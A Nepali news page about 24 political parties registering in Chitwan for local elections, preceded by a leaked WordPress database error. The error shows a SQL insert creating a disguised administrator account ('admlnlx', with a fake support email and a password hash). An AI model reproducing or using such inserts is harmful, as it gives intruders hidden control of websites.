WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/uw2XIkGjZpIOmXe9DT/eW55ZMhYO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:44:19', '', 'admlnlx', 'admlnlx')
चितवन, माघ १७–
स्थानीय निर्वाचनका लागि सहभागी हुन र तयारी गर्नका लागि चितवनमा २४ राजनीतिक दल जिल्ला निर्वाचन कार्यालय, चितवनमा दर्ता भएका छन् ।
निर्वाचन आयोगले आजसम्ममा सबै राजनीतिक दलको विवरण पेस गर्नुपर्ने निर्देशनअनुसार चितवनमा आज अन्तिम दिन पाँच बजेसम्ममा २४ राजनीतिक दलले पार्टीको विवरण बुझाएको जिल्ला निर्वाचन कार्यालय, चितवनका निर्वाचन अधिकारी हरिप्रसाद ढकालले नारायणी अनलाईनलाई जानकारी दिनुभयो ।
पार्टीको विवरण बुझाएर दर्ता भएका दलमा नेपाली काँग्रेस, नेकपा (एमाले), नेकपा (माओवादी केन्द्र), राष्ट्रिय प्रजातन्त्र पार्टी, नेकपा (माले), राष्ट्रिय जनमोर्चा नेपाल, नयाँ शक्ति पार्टी नेपाल, मधेसी जनाधिकार फोरम (लोकतान्त्रिक) रहेका छन् ।
यस्तै नेपाल जनजागरण पार्टी, नेपाल दलित पार्टी, युनाइटेड ग्रेन अर्गनाइजेसन पार्टी, राष्ट्रिय जनमुक्ती पार्टी, नेपाल मजदुर किसान पार्टी, राष्ट्रिय मधेस समाजवादी पार्टी, सद्भावन पार्टी, नेपाल पूर्व राष्ट्रसेवक लोकतान्त्रिक पार्टी, संघीय लोकतान्त्रिक राष्ट्रिय मञ्च (थरुहट), तराई मधेस लोकतान्त्रिक पार्टी, माले समाजवादी, राष्ट्रिय जनमुक्ती पार्टी (लोकतान्त्रिक), नेकपा माले, नेपाल परिवार दल, विवेकशील नेपाली दल, नेपाल प्रजातान्त्रिक प्रगतिशिल पार्टी र नेपाल आमा पार्टी पनि विवरण बुझाएर आधिकारिक रुपमा दर्ता गरेको जिल्ला निर्वाचन अधिकारी ढकालले बताउनुभयो ।
चितवनमा नयाँ शक्ति नेपाल पार्टी, नेपाल जनजागरण पार्टी, बहुजन शक्ति पार्टी, नेपाल पूर्व राष्ट्रसेवक लोकतान्त्रिक पार्टी, युनाइटेड ग्रेन अर्गनाइजेसन लगायतका नयाँ पार्टीका रुपमा दर्ता भएका जिल्ला निर्वाचन कार्यालयले जनाएको छ ।
सरकारले स्थानीय तह निर्वाचन मिति घोषणाको तयारी गरिरहँदा केन्द्रमा र सम्बन्धित जिल्लामा पार्टी दर्ता गराएमात्र स्थानीय निर्वाचनमा सहभागी हुन पाउने प्रावधान रहेको छ ।